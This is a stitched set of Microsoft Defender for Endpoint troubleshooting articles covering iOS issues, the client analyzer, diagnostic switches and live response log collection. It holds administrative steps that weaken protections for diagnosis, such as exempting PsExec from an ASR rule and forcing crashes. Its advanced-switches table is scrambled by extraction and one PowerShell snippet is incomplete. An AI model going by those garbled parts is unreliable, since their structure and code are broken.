Phishing websites impersonate trustworthy websites for obtaining your personal or
financial information. Visit the Provide feedback about network protection page to
report a website that could be a phishing site.
Malicious site detected

Microsoft Defender for Endpoint protects you against phishing or other web-based
attacks. If a malicious site is detected, the connection is blocked and an alert is sent to
the organization's Microsoft Defender portal. The alert includes the domain name of the
connection, remote IP address and the device details.
In addition, a notification is shown on the iOS device. Tapping on the notification opens
the following screen for the user to review the details.

Device not seen on the Defender for Endpoint

console after onboarding
After onboarding, it takes few hours for device to show up in the Device inventory in the
Defender for Endpoint security console. Also, ensure that device is registered correctly
with Microsoft Entra ID and device has internet connectivity. For successful onboarding,
the device has to be registered via Microsoft Authenticator or Intune Company Portal
and the user needs to sign-in using the same account with which device is registered
with Microsoft Entra ID.
７ Note
Sometimes, the device name is not consistent with that in Microsoft Intune admin
center. The device name in Defender for Endpoint console is of the format
<username_iPhone/iPad model>. You can also use Microsoft Entra device ID to
identify the device in the Defender for Endpoint console.
Data and Privacy

For details about data collected and privacy, see Privacy Information - Microsoft
Defender for Endpoint on iOS.
Connectivity issue on cellular network

If you are facing internet connectivity issues on cellular network, check if Microsoft
Defender for Endpoint has cellular data enabled: Open Settings app > MS Defender >
ensure that "Cellular data" is enabled for MS Defender.
If you still have connectivity issues, check if turning on/off Airplane mode helps resolve
the issue. If the issue persists, send us logs.
Issues on supervised devices with content filter

profile installed
There's an issue on supervised devices with Defender for Endpoint content filter
installed. If you observe slowness or latency in internet connectivity on such devices,
uninstall or delete the content filter profile from the device. We're working to resolve
this issue and will update this place once we've a resolution.
Issues during app updates from the app store

By default, apps that are downloaded from the app store are updated automatically.
But if there's an issue, you can update the app manually.

On your iOS device, open the App Store.
Tap on Menu (profile icon) on the top-left corner.
Scroll to see any pending updates and release notes. Tap Update next to an app to
update only that app, or tap Update All.
You can also choose to turn off automatic updates. On your iOS device, open the
Settings app > go to App Store > toggle off App Updates to turn off automatic
updates.
If you observe issues when the app is updated through the app store (either automatic
updates or manual updates), you might need to restart the device. If that doesn't resolve
the issue, you can disable the Defender VPN and perform the app update. You can also
provide an in-app feedback to report this issue.
Send in-app feedback

If a user faces an issue which isn't already addressed in the above sections or is unable
to resolve using the listed steps, the user can provide in-app feedback along with
diagnostic data. Our team will then investigate the logs to provide the right solution.
Users can use the following steps to send feedback:
Open MSDefender app on the iOS/iPadOS device.

Tap on Menu (profile icon) on the top-left corner.
Tap Send Feedback.
Choose from the given options. To report an issue, select I don't like something.
Provide details of the issue that you're facing and check Send diagnostic data. We
recommend that you include your email address so that the team can contact you
for a solution or a follow-up.
Tap Submit to successfully send the feedback.
 Tip
Feedback
Troubleshoot sensor health using
Analyzer
Article • 02/27/2024
Applies to:

The Microsoft Defender for Endpoint Client Analyzer (MDECA) can be useful when
diagnosing sensor health or reliability issues on onboarded devices running either
Windows, Linux, or macOS. For example, you may want to run the analyzer on a
machine that appears to be unhealthy according to the displayed sensor health status
(Inactive, No Sensor Data or Impaired Communications) in the security portal.
Besides obvious sensor health issues, MDECA can collect other traces, logs, and
diagnostic information for troubleshooting complex scenarios such as:
Application compatibility (AppCompat), performance, network connectivity, or

Unexpected behavior related to Endpoint Data Loss Prevention.
Privacy notice
Microsoft Customer Support Services (CSS) to collect information that will help
troubleshoot issues you may be experiencing with Microsoft Defender for
Endpoint.
The collected data may contain Personally Identifiable Information (PII) and/or
sensitive data, such as (but not limited to) IP addresses, PC names, and usernames.
Once data collection is complete, the tool saves the data locally on the machine
within a subfolder and compressed zip file.
No data is automatically sent to Microsoft. If you are using the tool during
collaboration on a support issue, you may be asked to send the compressed data
to Microsoft CSS using Secure File Exchange to facilitate the investigation of the
issue.
For more information about Secure File Exchange, see How to use Secure File Exchange
to exchange files with Microsoft Support
For more information about our privacy statement, see Microsoft Privacy Statement .
Requirements
Before running the analyzer, we recommend ensuring your proxy or firewall
configuration allows access to Microsoft Defender for Endpoint service URLs.
The analyzer can run on supported editions of Windows, Linux, or macOS either
before of after onboarding to Microsoft Defender for Endpoint.
For Windows devices, if you are running the analyzer directly on specific machines
and not remotely via Live Response, then SysInternals PsExec.exe should be
allowed (at least temporarily) to run. The analyzer calls into PsExec.exe tool to run
cloud connectivity checks as Local System and emulate the behavior of the SENSE
service.
７ Note
On Windows devices, if you use the attack surface reduction rule Block
process creations originating from PSExec and WMI commands, you might
want to temporarily configure an exclusion to the ASR rule. Optionally, you
can set the rule to audit or you can disable the rule. Making these
configurations allows the analyzer to run connectivity checks to cloud without
being blocked.
 Tip
Feedback

Download the Microsoft Defender for
Endpoint client analyzer
Article • 02/21/2024
Applies to:

Learn how to download the Microsoft Defender for Endpoint client analyzer on
supported Windows, macOS, and Linux Operating Systems.
Download client analyzer for Windows OS

1. The latest stable edition is available for download from following URL:
https://aka.ms/MDEAnalyzer
2. The latest preview edition is available for download from following URL:
https://aka.ms/BetaMDEAnalyzer
Download client analyzer for macOS or Linux

1. The latest stable edition will be integrated into the MDE for Endpoint agent. Ensure
that you are running the latest edition for either macOS or Linux.
2. The latest preview edition is available for direct download from following URL:
https://aka.ms/XMDEClientAnalyzer
 Tip
Feedback

Article • 11/01/2023
Applies to:

Option 1: Live response

You can collect the Defender for Endpoint analyzer support logs remotely using Live
Response.
Option 2: Run MDE Client Analyzer locally

1. Download the MDE Client Analyzer tool or Beta MDE Client Analyzer tool to
the Windows device you want to investigate.
The file is saved to your Downloads folder by default.
2. Open your Downloads folder, right-click on MDEClientAnalyzer.zip, and then

select Properties.
3. Extract the contents of MDEClientAnalyzer.zip to an available folder.
4. Open a command line with administrator permissions:

5. Type the following command and then press Enter:
*DrivePath*\MDEClientAnalyzer.cmd
Replace DrivePath with the path where you extracted MDEClientAnalyzer, for
example:
C:\Work\tools\MDEClientAnalyzer\MDEClientAnalyzer.cmd
In addition to the previous procedure, you can also collect the analyzer support logs
using live response..
７ Note
On Windows 10 and 11, Windows Server 2019 and 2022, or Windows Server
2012R2 and 2016 with the modern unified solution installed, the client analyzer
script calls into an executable file called MDEClientAnalyzer.exe to run the
connectivity tests to cloud service URLs.
On Windows 8.1, Windows Server 2016 or any previous OS edition where Microsoft
Monitoring Agent (MMA) is used for onboarding, the client analyzer script calls into
an executable file called MDEClientAnalyzerPreviousVersion.exe to run connectivity
tests for Command and Control (CnC) URLs while also calling into Microsoft
Monitoring Agent connectivity tool TestCloudConnection.exe for Cyber Data
channel URLs.

All the PowerShell scripts and modules included with the analyzer are Microsoft-signed.
If files were modified in any way, then the analyzer is expected to exit with the following
error:
If you see this error, the issuerInfo.txt output contains detailed information about why
this happened and the affected file:

Example contents after MDEClientAnalyzer.ps1 is modified:
Result package contents on Windows
７ Note
The exact files captured may change depending on factors such as:
The version of windows on which the analyzer is run.

Event log channel availability on the machine.
The start state of the EDR sensor (Sense is stopped if machine is not yet
onboarded).
If an advanced troubleshooting parameter was used with the analyzer
command.
By default, the unpacked MDEClientAnalyzerResult.zip file contains the following items.
MDEClientAnalyzer.htm
This is the main HTML output file, which will contain the findings and guidance
that the analyzer script run on the machine can produce.
SystemInfoLogs [Folder]
AddRemovePrograms.csv
Description: List of x64 installed software on x64 OS collected from registry.
AddRemoveProgramsWOW64.csv
Description: List of x86 installed software on x64 OS collected from registry.
CertValidate.log
Description: Detailed result from certificate revocation executed by calling
into CertUtil.
dsregcmd.txt
Description: Output from running dsregcmd. This provides details about the
Microsoft Entra status of the machine.
IFEO.txt
Description: Output of Image File Execution Options configured on the

machine
MDEClientAnalyzer.txt
Description: This is verbose text file showing with details of the analyzer
script execution.
MDEClientAnalyzer.xml
Description: XML format containing the analyzer script findings.
RegOnboardedInfoCurrent.Json
Description: The onboarded machine information gathered in JSON format

from the registry.
RegOnboardingInfoPolicy.Json
Description: The onboarding policy configuration gathered in JSON format from

the registry.
SCHANNEL.txt
Description: Details about SCHANNEL configuration applied to the machine

such gathered from registry.
SessionManager.txt
Description: Session Manager specific settings gather from registry.
SSL_00010002.txt
Description: Details about SSL configuration applied to the machine gathered

from registry.
EventLogs [Folder]
utc.evtx
Description: Export of DiagTrack event log
senseIR.evtx
Description: Export of the Automated Investigation event log
sense.evtx
Description: Export of the Sensor main event log
OperationsManager.evtx
Description: Export of the Microsoft Monitoring Agent event log
MdeConfigMgrLogs [Folder]
SecurityManagementConfiguration.json
Description: Configurations sent from MEM (Microsoft Endpoint Manager) for

enforcement.
policies.json
Description: Policies settings to be enforced on the device.
report_xxx.json
Description: Corresponding enforcement results.
See also
 Tip
Feedback

Run the client analyzer on macOS and
Linux
Article • 02/09/2024
Applies to:

The XMDEClientAnalyzer is used for diagnosing Microsoft Defender for Endpoint health
or reliability issues on onboarded devices running either Linux, or macOS.
There are two ways to run the client analyzer tool:
1. Using a binary version (no Python dependency)

2. Using a Python-based solution
Running the binary version of the client

analyzer
1. Download the XMDE Client Analyzer Binary tool to the macOS or Linux machine
you need to investigate.
If you're using a terminal, download the tool by entering the following command:
Console
wget --quiet -O XMDEClientAnalyzerBinary.zip

https://aka.ms/XMDEClientAnalyzerBinary
2. Verify the download.
７ Note
The current SHA256 hash of 'XMDEClientAnalyzerBinary.zip' that is

downloaded from this link is:
'0A8E32B618F278BED60AB6763E9458BA2CD02C99D718E50DCCE51A7DBAC6
9863'
Console
echo '0A8E32B618F278BED60AB6763E9458BA2CD02C99D718E50DCCE51A7DBAC69863
XMDEClientAnalyzerBinary.zip' | sha256sum -c
3. Extract the contents of XMDEClientAnalyzerBinary.zip on the machine.
If you're using a terminal, extract the files by entering the following command:
Console
unzip -q XMDEClientAnalyzerBinary.zip -d XMDEClientAnalyzerBinary
4. Change to the tool's directory by entering the following command:
Console
cd XMDEClientAnalyzerBinary
5. Three new zip files are produced:
SupportToolLinuxBinary.zip : For all Linux devices

SupportToolmacOSBinary.zip : For Intel-based Mac devices
SupportToolmacOS-armBinary.zip : For Arm-based Mac devices
6. Unzip one of the above 3 zip files based on the machine you need to investigate.
When using a terminal, unzip the file by entering one of the following commands
based on machine type:
Linux
Console
unzip -q SupportToolLinuxBinary.zip
Intel-based Mac
Console
unzip -q SupportToolmacOSBinary.zip
For Arm-based Mac devices
Console
unzip -q SupportToolmacOS-armBinary.zip
7. Run the tool as root to generate diagnostic package:
Console
sudo ./MDESupportTool -d
Running the Python-based client analyzer
７ Note
The analyzer depends on few extra PIP packages (sh, distro, lxml, pandas)
which are installed in the OS when in root to produce the result output. If not
installed, the analyzer will try to fetch it from the official repository for
Python packages .
２ Warning
Running the Python-based client analyzer requires the installation of PIP

packages which may cause some issues in your environment. To avoid
issues from occurring, it is recommended that you install the packages
into a user PIP environment.
In addition, the tool currently requires Python version 3 or later to be

installed.
If your device is behind a proxy, then you can simply pass the proxy server as
an environment variable to the mde_support_tool.sh script. For example: .
https_proxy=https://myproxy.contoso.com:8080 ./mde_support_tool.sh"
1. Download the XMDE Client Analyzer tool to the macOS or Linux machine you
need to investigate.
If you're using a terminal, download the tool by running the following command:
Console
wget --quiet -O XMDEClientAnalyzer.zip
https://aka.ms/XMDEClientAnalyzer
2. Verify the download
Console
echo '926DEF4C6857641E205E7978126F7C2CE541D52AEA1C0E194DDB85F7BCFDE3D9
XMDEClientAnalyzer.zip' | sha256sum -c
3. Extract the contents of XMDEClientAnalyzer.zip on the machine.

If you're using a terminal, extract the files by using the following command:
Console
unzip -q XMDEClientAnalyzer.zip -d XMDEClientAnalyzer
4. Change directory to the extracted location.
Console
cd XMDEClientAnalyzer
5. Give the tool executable permission:
Console
chmod a+x mde_support_tool.sh
6. Run as a non-root user to install required dependencies:
Console
./mde_support_tool.sh
7. To collect actual diagnostic package and generate the result archive file, run again
as root:
Console
sudo ./mde_support_tool.sh -d
Command line options
Primary command lines

Use the following command to get the machine diagnostic.
Console
-h, --help show this help message and exit

--output OUTPUT, -o OUTPUT
Output path to export report
--outdir OUTDIR Directory where diagnostics file will be generated
--no-zip, -nz If set a directory will be created instead of an
archive file
--force, -f Will overwrite if output directory exists
--diagnostic, -d Collect extensive machine diagnostic information
--bypass-disclaimer Do not display disclaimer banner
--mdatp-log {info,debug,verbose,error,trace,warning}
Set MDATP log level
--max-log-size MAX_LOG_SIZE
Maximum log file size in MB before rotating(Will
restart mdatp)
Usage example: sudo ./MDESupportTool -d
Positional arguments
Collect performance info
Collect extensive machine performance tracing for analysis of a performance scenario

that can be reproduced on demand.
Console

--frequency FREQUENCY
profile at this frequency
--length LENGTH length of time to collect (in seconds)
Usage example: sudo ./MDESupportTool performance --frequency 2
Use OS trace (for macOS only)
Use OS tracing facilities to record Defender for Endpoint performance traces.

７ Note
This functionality exists in the Python solution only.
Console

--length LENGTH Length of time to record the trace (in seconds).
--mask MASK Mask to select with event to trace. Defaults to all
On running this command for the first time, it installs a Profile configuration.
Follow this to approve profile installation: Apple Support Guide .
Usage example ./mde_support_tool.sh trace --length 5
Exclude mode
Add exclusions for audit-d monitoring.
７ Note
This functionality exists for Linux only.
Console

-e <executable>, --exe <executable>
exclude by executable name, i.e: bash
-p <process id>, --pid <process id>
exclude by process id, i.e: 911
-d <directory>, --dir <directory>
exclude by target path, i.e: /var/foo/bar
-x <executable> <directory>, --exe_dir <executable> <directory>
exclude by executable path and target path, i.e:
/bin/bash /var/foo/bar
-q <q_size>, --queue <q_size>
set dispatcher q_depth size
-r, --remove remove exclusion file
-s, --stat get statistics about common executables
-l, --list list auditd rules
-o, --override Override the existing auditd exclusion rules file
for mdatp
-c <syscall number>, --syscall <syscall number>
exclude all process of the given syscall
Usage example: sudo ./MDESupportTool exclude -d /var/foo/bar
AuditD Rate Limiter

Syntax that can be used to limit the number of events being reported by the auditD
plugin. This option sets the rate limit globally for AuditD causing a drop in all the audit
events. When the limiter is enabled the number of auditd events are limited to 2500
events/sec. This option can be used in cases where we see high CPU usage from AuditD
side.
７ Note
This functionality exists for Linux only.
Console

-e <true/false>, --enable <true/false> enable/disable the rate limit
with default values
Usage example: sudo ./mde_support_tool.sh ratelimit -e true
７ Note
This functionality should be carefully used as limits the number of events being
reported by the auditd subsystem as a whole. This could reduces the number of
events for other subscribers as well.
AuditD Skip Faulty Rules

This option enables you to skip the faulty rules added in the auditd rules file while
loading them. This option allows the auditd subsystem to continue loading rules even if
there's a faulty rule. This option summarizes the results of loading the rules. In the
background, this option runs the auditctl with the -c option.
７ Note
This functionality is only available on Linux.
Console
-e <true/false>, --enable <true/false> enable/disable the option to
skip the faulty rules. In case no argumanet is passed, the option will be
true by default.
Usage example: sudo ./mde_support_tool.sh skipfaultyrules -e true
７ Note
This functionality will be skipping the faulty rules. The faulty rule then needs to be
further identified and fixed.
Result package contents on macOS and Linux

report.html
Description: The main HTML output file that contains the findings and guidance
that the analyzer script run on the machine can produce.
mde_diagnostic.zip
Description: Same diagnostic output that gets generated when running mdatp
diagnostic create on either macOS or Linux.
mde.xml
Description: XML output that is generated while running and is used to build the
html report file.
Processes_information.txt
Description: contains the details of the running Microsoft Defender for Endpoint
related processes on the system.
Log.txt
Description: contains the same log messages written on screen during the data
collection.
Health.txt
Description: The same basic health output that is shown when running mdatp
health command.
Events.xml
Description: Additional XML file used by the analyzer when building the HTML
report.
Audited_info.txt
Description: details on audited service and related components for Linux OS.
perf_benchmark.tar.gz
Description: The performance test reports. You'll see this only if you're using the
performance parameter.
 Tip
Feedback

Data collection for advanced
troubleshooting on Windows
Article • 02/27/2024
Applies to:
When collaborating with Microsoft support professionals, you might be asked to use the
client analyzer to collect data for troubleshooting of more complex scenarios. The
analyzer script supports other parameters for that purpose and can collect a specific log
set based on the observed symptoms that need to be investigated.
Run MDEClientAnalyzer.cmd /? to see the list of available parameters and their

description:
ﾉ Expand table
Switch Description When to use Process that you're

troubleshooting.
-h Calls into Windows Slow application One of the following:

Performance Recorder to start/launch. When clicking - MSSense.exe
collect a verbose general on a button on the app, - MsSenseS.exe
performance trace in taking x seconds longer. - SenseIR.exe
troubleshooting.
addition to the standard - SenseNdr.exe

log set. - SenseTVM.exe
-
SenseAadAuthenticator.exe
- SenseGPParser.exe
- SenseImdsCollector.exe
- SenseSampleUploader.exe
- MsMpEng.exe
- NisSrv.exe
-l Calls into built-in Windows Troubleshooting application One of the following:

Performance Monitor to performance that could be - MSSense.exe
collect a lightweight slow to reproduce - MsSenseS.exe
perfmon trace. This (manifest) itself. We - SenseIR.exe
scenario can be useful recommend capturing up to - SenseNdr.exe
when diagnosing slow three minutes (at most five - SenseTVM.exe
performance degradation minutes), because your data -
issues that occur over time set could get too large. SenseAadAuthenticator.exe
but hard to reproduce on - SenseGPParser.exe
demand. - SenseImdsCollector.exe
- MsMpEng.exe
- NisSrv.exe
-c Calls into process monitor Process Monitor (ProcMon) One of the following:
for advanced monitoring to initiate a boot trace when - MSSense.exe
of real-time file system, investigating a driver or - MsSenseS.exe
registry, and service or application - SenseIR.exe
process/thread activity. startup delay related issue. - SenseNdr.exe
This is especially useful Or applications hosted on a - SenseTVM.exe
when troubleshooting network share that aren't -
various application using SMB Opportunistic SenseAadAuthenticator.exe
compatibility scenarios. Locking (Oplock) properly - SenseGPParser.exe
causing application - SenseImdsCollector.exe
compatibility problems. - SenseSampleUploader.exe
- MsMpEng.exe
- NisSrv.exe
-i Calls into built-in netsh.exe When troubleshooting One of the following

command to start a network related issues such processes:
network and Windows as Defender for Endpoint - MSSense.exe
Firewall trace that is useful EDR telemetry or CnC data - MsSenseS.exe
when troubleshooting submission issues. Microsoft - SenseIR.exe
various network-related Defender Antivirus Cloud - SenseNdr.exe
issues. Protection (MAPS) reporting - SenseTVM.exe
-
troubleshooting.
issues. Network protection SenseAadAuthenticator.exe

related issues, and so forth. - SenseGPParser.exe
- MsMpEng.exe
- NisSrv.exe
-b Same as -c but the Process Monitor (ProcMon) One of the following

process monitor trace will to initiate a boot trace when processes:
be initiated during next investigating a driver or - MSSense.exe
boot and stopped only service or application - MsSenseS.exe
when the -b is used again. startup delay related issue. - SenseIR.exe
This scenario can also be - SenseNdr.exe
used to investigate a slow - SenseTVM.exe
boot or slow sign-in. -
SenseAadAuthenticator.exe
- SenseGPParser.exe
- MsMpEng.exe
- NisSrv.exe
-e Calls into Windows When troubleshooting MsMpEng.exe

Performance Recorder to Cloud Protection (MAPS)
collect Defender AV Client reporting failures.
tracing (AM-Engine and
AM-Service) for analysis of
Antivirus cloud
connectivity issues.
-a Calls into Windows When troubleshooting high MsMpEng.exe

Performance Recorder to cpu utilization with
collect a verbose Microsoft Defender
performance trace specific Antivirus (Antimalware
to analysis of high CPU Service Executable or
issues related to the MsMpEng.exe) if you
antivirus process already used the Microsoft
(MsMpEng.exe). Defender Antivirus
Performance Analyzer to
narrow down the
/path/process or /path or
file extension contributing
to the high cpu utilization.
This scenario enables further
investigate what the
application or service is
troubleshooting.
doing to contribute to the

high cpu utilization.
-v Uses antivirus Anytime an advanced MsMpEng.exe

MpCmdRun.exe command troubleshooting is needed.
line argument with most Such as when
verbose -trace flags. troubleshooting Cloud
Protection (MAPS) reporting
failures, Platform Update
failures, Engine update
failures, Security Intelligence
Update failures, False
negatives, etc. Can also be
used with -b , -c , -h , or -l .
-t Starts verbose trace of all When running into issues MpDlpService.exe

client-side components where the Microsoft
relevant to Endpoint DLP, Endpoint Data Loss
which is useful for Prevention (DLP) actions
scenarios where DLP expected aren't occurring.
actions aren't happening
as expected for files.
-q Calls into Checks the basic MpDlpService.exe

DLPDiagnose.ps1 script configuration and
from the analyzer Tools requirements for Microsoft
directory that validates the Endpoint DLP
basic configuration and
requirements for Endpoint
DLP.
-d Collects a memory dump On Windows 7 SP1, MsSenseS.exe

of MsSenseS.exe (the Windows 8.1, Windows
sensor process on Server 2008 R2, Windows
Windows Server 2016 or Server 2012 R2 or Windows
older OS) and related Server 2016 running w/ the
processes. - * This flag can MMA agent and having
be used with above performance (high cpu or
mentioned flags. - ** high memory usage) or
Capturing a memory application compatibility
dump of PPL protected issues.
processes such as
MsSense.exe or
MsMpEng.exe isn't
supported by the analyzer
at this time.
troubleshooting.
-z Configures registry keys Machine hanging or being MSSense.exe or

on the machine to prepare unresponsive or slow. High MsMpEng.exe
it for full machine memory memory usage (Memory
dump collection via leak): a) User mode: Private
CrashOnCtrlScroll. This bytes b) Kernel mode:
would be useful for paged pool or nonaged
analysis of computer pool memory, handle leaks.
freeze issues. * Hold down
the rightmost CTRL key,
then press the SCROLL
LOCK key twice.
-k Uses NotMyFault tool to Same as above. MSSense.exe or

force the system to crash MsMpEng.exe
and generate a machine
memory dump. This would
be useful for analysis of
various OS stability issues.
The analyzer, and all of the scenario flags listed in this article, can be initiated remotely
by running RemoteMDEClientAnalyzer.cmd , which is also bundled into the analyzer
toolset:
７ Note
When any advanced troubleshooting parameter is used, the analyzer also calls into
MpCmdRun.exe to collect Microsoft Defender Antivirus related support logs. You
can use -g flag to validate URLs for a specific datacenter region even without
being onboarded to that region
For example, MDEClientAnalyzer.cmd -g EU forces the analyzer to test cloud URLs in
Europe region.
A few points to keep in mind
When you use RemoteMDEClientAnalyzer.cmd , it calls into psexec to download the tool
from the configured file share and then run it locally via PsExec.exe .
The CMD script uses the -r flag to specify that it is running remotely within SYSTEM
context, and so no prompt is presented to the user.
That same flag can be used with MDEClientAnalyzer.cmd to avoid a prompt to the user
to specify the number of minutes for data collection. For example, consider
MDEClientAnalyzer.cmd -r -i -m 5 .
-r indicates that tool is being run from remote (or non-interactive context).
-i is the scenario flag for collection of network trace along with other related logs.
-m # denotes the number of minutes to run (we used 5 minutes in our example).
When using MDEClientAnalyzer.cmd , the script checks for privileges using net session ,
which requires the service Server to be running. If it's not, you will get the error
message Script is running with insufficient privileges. Run it with administrator privileges
if ECHO is off.
 Tip
Feedback

Understand the client analyzer HTML
report
Article • 02/15/2024
Applies to:

The client analyzer produces a report in HTML format. Learn how to review the report to
identify potential sensor issues so that you can troubleshoot them.
Use the following example to understand the report.
Example output from the analyzer on a machine onboarded to expired Org ID and
failing to reach one of the required Microsoft Defender for Endpoint URLs:
On top, the script version and script runtime are listed for reference
The Device Information section provides basic OS and device identifiers to

uniquely identify the device on which the analyzer has run.
The Endpoint Security Details provides general information about Microsoft

Defender for Endpoint-related processes including Microsoft Defender Antivirus
and the sensor process. If important processes aren't online as expected, the color
will change to red.

On Check Results Summary, you'll have an aggregated count for error, warning, or
informational events detected by the analyzer.
On Detailed Results, you'll see a list (sorted by severity) with the results and the
guidance based on the observations made by the analyzer.
Open a support ticket to Microsoft and include

the Analyzer results
To include analyzer result files when opening a support ticket, make sure you use the
Attachments section and include the MDEClientAnalyzerResult.zip file:
７ Note
If the file size is larger than 25 MB, the support engineer assigned to your case will
provide a dedicated secure workspace to upload large files for analysis.
 Tip
Feedback

Provide feedback on the Microsoft
Defender for Endpoint client analyzer
tool
Article • 02/15/2024
Applies to:

If you have feedback or suggestions that would help us improve the Microsoft Defender
for Endpoint client analyzer, use either of these options to submit feedback:
1. Microsoft Defender portal (security.microsoft.com):
2. Microsoft Defender portal (security.microsoft.com):
 Tip
Feedback

Troubleshoot service issues
Article • 07/18/2023
Applies to:

This section addresses issues that might arise as you use the Microsoft Defender for
Endpoint service.
Server error - Access is denied due to invalid

credentials
If you encounter a server error when trying to access the service, you need to change
your browser cookie settings. Configure your browser to allow cookies.
Elements or data missing on the portal

If some elements or data is missing on Microsoft Defender XDR, it's possible that proxy
settings are blocking it.
Make sure that *.security.microsoft.com is included the proxy allowlist.
７ Note
You must use the HTTPS protocol when adding the following endpoints.
Microsoft Defender for Endpoint service shows

event or error logs in the Event Viewer
See Review events and errors using Event Viewer for a list of event IDs that are reported
by the Microsoft Defender for Endpoint service. The article also contains
troubleshooting steps for event errors.
Microsoft Defender for Endpoint service fails to
start after a reboot and shows error 577
If onboarding devices successfully completes but Microsoft Defender for Endpoint
doesn't start after a reboot and shows error 577, check that Windows Defender isn't
disabled by a policy.
For more information, see Ensure that Microsoft Defender Antivirus is not disabled by
policy.
Known issues with regional formats
Date and time formats

There are some known issues with the time and date formats.
The following date formats are supported:
MM/dd/yyyy
dd/MM/yyyy
The following date and time formats are currently not supported:
Date format yyyy/MM/dd

Date format dd/MM/yy
Date format with yy. Will only show yyyy.
Time format HH:mm:ss isn't supported (the 12 hour AM/PM format isn't
supported). Only the 24-hour format is supported.
Use of comma to indicate thousand

Support of use of comma as a separator in numbers aren't supported. Regions where a
number is separated with a comma to indicate a thousand, will only see the use of a dot
as a separator. For example, 15,5 K is displayed as 15.5 K.
Microsoft Defender for Endpoint tenant was

automatically created in Europe
When you use Microsoft Defender for Cloud to monitor servers, a Microsoft Defender
for Endpoint tenant is automatically created. The Microsoft Defender for Endpoint data
is stored in Europe by default.
Related topics
Review events and errors using Event Viewer
 Tip
Feedback

Contact Microsoft Defender for
Endpoint support
Article • 12/06/2023
Applies to:

Defender for Endpoint has recently upgraded the support process to offer a more
modern and advanced support experience.
The new widget allows customers to:
Find solutions to common problems

Submit a support case to the Microsoft support team
Prerequisites
It's important to know the specific roles that have permission to open support cases.
At a minimum, you must have a Service Support Administrator OR Helpdesk

Administrator role.
For more information on which roles have permission, see Security Administrator
permissions.
For general information on admin roles, see About admin roles.
Access the widget

Accessing the new support widget can be done in one of two ways:
1. Clicking on the question mark on the top right of the portal and then clicking on
"Microsoft support":

2. Clicking on the Need help? button in the bottom right of the Microsoft Defender
portal:

In the widget you'll be offered two options:

Open a service request

This option includes articles that might be related to the question you may ask. Just start
typing the question in the search box and articles related to your search will be surfaced.

In case the suggested articles aren't sufficient, you can open a service request.
Open a service request

Learn how to open support tickets by contacting Defender for Endpoint support.
７ Note
If you have a premier support contract with Microsoft, you'll see the premier tag on
the widget. If not, contact your Microsoft account manager.
Contact support

1. Fill in a title and description for the issue you are facing, the phone number and
email address where we may reach you.
2. (Optional) Include up to five attachments that are relevant to the issue to provide
additional context for the support case.
3. Select your time zone and an alternative language, if applicable. The request will
be sent to Microsoft Support Team. The team will respond to your service request
shortly.
Related topics
Troubleshoot service issues
Check service health
 Tip
Feedback

Troubleshoot Microsoft Defender for
Endpoint live response issues
Article • 02/16/2024
Applies to:

This page provides detailed steps to troubleshoot live response issues.
File can't be accessed during live response

sessions
If while trying to take an action during a live response session, you encounter an error
message stating that the file can't be accessed, take the following steps to address the
issue.
1. Copy the following script code snippet and save it as a PS1 file:
PowerShell
$copied_file_path=$args[0]
$action=Copy-Item $copied_file_path -Destination $env:TEMP -PassThru -
ErrorAction silentlyContinue
if ($action){
Write-Host "You copied the file specified in $copied_file_path to
$env:TEMP Successfully"
}
else{
Write-Output "Error occurred while trying to copy a file, details:"
Write-Output $error[0].exception.message
2. Add the script to the live response library.
3. Run the script with one parameter: the file path of the file to be copied.
4. Navigate to your TEMP folder.
5. Run the action you wanted to take on the copied file.
Slow live response sessions or delays during

initial connections
Live response uses Defender for Endpoint sensor registration with WNS service in
Windows. If you're having connectivity issues with live response, confirm the following
details:
1. WpnService (Windows Push Notifications System Service) isn't disabled.
2. WpnService connectivity with WNS cloud isn't disabled via group policy or MDM
setting. 'Turn off notifications network usage' shouldn't be set to 1 .
Refer to the following articles to fully understand the WpnService service behavior and
requirements:
Windows Push Notification Services (WNS) overview

Enterprise Firewall and Proxy Configurations to Support WNS Traffic
Microsoft Push Notifications Service (MPNS) Public IP ranges
 Tip
Feedback

Collect support logs in Microsoft
Defender for Endpoint using live
response
Article • 07/18/2023
Applies to:

When contacting support, you may be asked to provide the output package of the
Microsoft Defender for Endpoint Client Analyzer tool.
This topic provides instructions on how to run the tool via Live Response.
1. Download and fetch the required scripts available from within the 'Tools' sub-
directory of the Microsoft Defender for Endpoint Client Analyzer .
For example, to get the basic sensor and device health logs, fetch
"..\Tools\MDELiveAnalyzer.ps1".
If you also require Defender Antivirus support logs (MpSupportFiles.cab), then
fetch "..\Tools\MDELiveAnalyzerAV.ps1"
2. Initiate a Live Response session on the machine you need to investigate.
3. Select Upload file to library.
4. Select Choose file.
5. Select the downloaded file named MDELiveAnalyzer.ps1 and then click on Confirm

6. While still in the LiveResponse session, use the commands below to run the
analyzer and collect the result file:
Console
Run MDELiveAnalyzer.ps1
GetFile "C:\ProgramData\Microsoft\Windows Defender Advanced Threat
Protection\Downloads\MDEClientAnalyzerResult.zip"
７ Note
The latest preview version of MDEClientAnalyzer can be downloaded here:

https://aka.ms/Betamdeanalyzer .
The LiveAnalyzer script downloads the troubleshooting package on the

destination machine from:
https://mdatpclientanalyzer.blob.core.windows.net .
If you cannot allow the machine to reach the above URL, then upload
MDEClientAnalyzerPreview.zip file to the library before running the
LiveAnalyzer script:
Console
PutFile MDEClientAnalyzerPreview.zip -overwrite
Run MDELiveAnalyzer.ps1
GetFile "C:\ProgramData\Microsoft\Windows Defender Advanced Threat
Protection\Downloads\MDEClientAnalyzerResult.zip"
For more information on gathering data locally on a machine in case the

machine isn't communicating with Microsoft Defender for Endpoint cloud
services, or does not appear in Microsoft Defender for Endpoint portal as
expected, see Verify client connectivity to Microsoft Defender for Endpoint
service URLs.
As described in Live response command examples, you may want to use the
'&' symbol at the end of the command to collect logs as a background action:
Console
Run MDELiveAnalyzer.ps1&
See also
 Tip
Feedback

Article • 02/16/2024
Applies to:

 Tip
This article provides troubleshooting information for network protection, in cases, such
as:
Network protection blocks a website that is safe (false positive)

Network protection fails to block a suspicious or known malicious website (false
negative)
There are four steps to troubleshooting these problems:
1. Confirm prerequisites
2. Use audit mode to test the rule
3. Add exclusions for the specified rule (for false positives)
Network protection works on devices with the following conditions:
＂ Endpoints are running Windows 10 Pro or Enterprise edition, version 1709 or

higher.
＂ Endpoints are using Microsoft Defender Antivirus as the sole antivirus protection
app. See what happens when you're using a non-Microsoft antivirus solution.
＂ Real-time protection is enabled.
＂ Cloud-delivered protection is enabled.
＂ Audit mode isn't enabled. Use Group Policy to set the rule to Disabled (value: 0).
Use audit mode

You can enable network protection in audit mode and then visit a website that's
